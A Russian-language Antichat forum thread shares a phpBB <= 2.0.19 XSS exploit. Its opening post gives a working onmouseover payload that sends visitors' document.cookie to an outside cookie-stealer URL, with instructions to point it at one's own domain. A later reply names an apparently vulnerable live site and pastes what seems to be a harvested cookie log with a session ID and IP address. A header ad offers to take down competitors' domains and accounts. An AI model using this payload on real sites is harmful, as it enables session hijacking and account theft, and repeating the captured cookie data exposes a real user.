Форум АНТИЧАТ - phpBB <= 2.0.19 XSS Remote Cookie Disclosure Exploit

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
phpBB <= 2.0.19 XSS Remote Cookie Disclosure Exploit

Опции темы

Поиск в этой теме

Опции просмотра

phpBB <= 2.0.19 XSS Remote Cookie Disclosure Exploit

31.01.2006, 13:55

TANZWUT

Крёстный отец :)

Регистрация: 22.06.2005

Сообщений: 1,330

Провел на форуме:
5302668

Репутация: 2054

Отправить сообщение для TANZWUT с помощью ICQ

phpBB <= 2.0.19 XSS Remote Cookie Disclosure Exploit

# to be used with cookie stealer located here: http://www.milw0rm.com/id.php?id=1103
# Make sure you change www.milw0rm.com to your domain. thnx. /str0ke
# Author: threesixthousan

/*
As long as html is ON in the latest version of phpBB forums,
several XSS attack vectors are possible. phpBB incorrectly
filters in both messages and profiles, making cookie stealing,
and other XSS attacks possible. the exploit leads to arbitary
javascript execution, which in turn can lead to html defacement.

use of the <pre> tag means that the cursor must pass it in the y
direction only. e.g. the mouse only needs to cross a point
horrizontaly equal to the link in order for the javascript to be executed.

the following is a simple attack:
*/

<pre a='>' onmouseover='document.location="http://www.milw0rm.com/cookie_stealer.php?c="+document.cook ie' b='<pre' >

[урл]http://www.somesite.com/[/урл]</pre>

"урл" пишем английскими буквами - url

Источник: _http://ivdb.org/poc/1236.htm

__________________
Лучший способ защиты - это нападение!!!

Последний раз редактировалось TANZWUT; 31.01.2006 в 14:38..

31.01.2006, 17:43

syntacsis

Участник форума

Регистрация: 14.11.2005

Сообщений: 146

Провел на форуме:
981128

Репутация: 43

Это из тех что только при включенном HTML работают? As long as html is ON in the latest version of phpBB forums... Что он имеет ввиду?

31.01.2006, 18:16

madnet

Умиротворенн

Регистрация: 09.12.2004

Сообщений: 996

Провел на форуме:
2386719

Репутация: 1384

Отправить сообщение для madnet с помощью ICQ

Проблема в том, что на форуме должен быть включен Html, а он по умолчанию выключен и я еще не встречал форумов где он разрешен, так что...

__________________

http://madnet.name - madnet - blog | homepage (Мысли, релизы, скрипты, софт)

http://antichat.ru - Лучший сайт по безопасности
irc.antichat.ru:7771 #antichat - общение online
ГАРАНТ ФОРУМА

10.06.2008, 20:15

xpi100

Новичок

Регистрация: 06.12.2007

Сообщений: 2

Провел на форуме:
4252

Репутация: 0

html on bbcode on
http://contacti-bg.free.bg/cgi-php/phpbb2

10.06.2008, 20:18

xpi100

Новичок

Регистрация: 06.12.2007

Сообщений: 2

Провел на форуме:
4252

Репутация: 0

Cookie: phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologini d%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bi%3 A-1%3B%7D;%20phpbb2mysql_sid=5a07a75738cf88a448b65db d45a5d1d6;%20__utma=85799179.2542689321017482000.1 212853877.1212853877.1212853877.1;%20__utmb=857991 79;%20__utmc=85799179;%20__utmz=85799179.121285387 7.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none );%20phpbb2mysql_t=a%3A2%3A%7Bi%3A22%3Bi%3A1213117 583%3Bi%3A23%3Bi%3A1213118622%3B%7D IP: 89.215.251.63 Date and Time: 10 June, 2008, 12:16 pm Referer:

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Фальсификация cookie	k00p3r	Чужие Статьи	6	11.04.2010 19:36
Новая XSS на форуме phpBB 2.0.19	NeMiNeM	Форумы	6	26.10.2006 21:30
phpBB <= 2.0.19 XSS Remote Cookie Disclosure Exploit	Rebz	Уязвимости	4	28.02.2006 19:45
phpBB <= 2.0.18 Remote Dictionary Attack Tool	D1mOn	Форумы	5	31.01.2006 19:54
Взлом через cookie	k00p3r	Чужие Статьи	0	13.06.2005 13:56

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход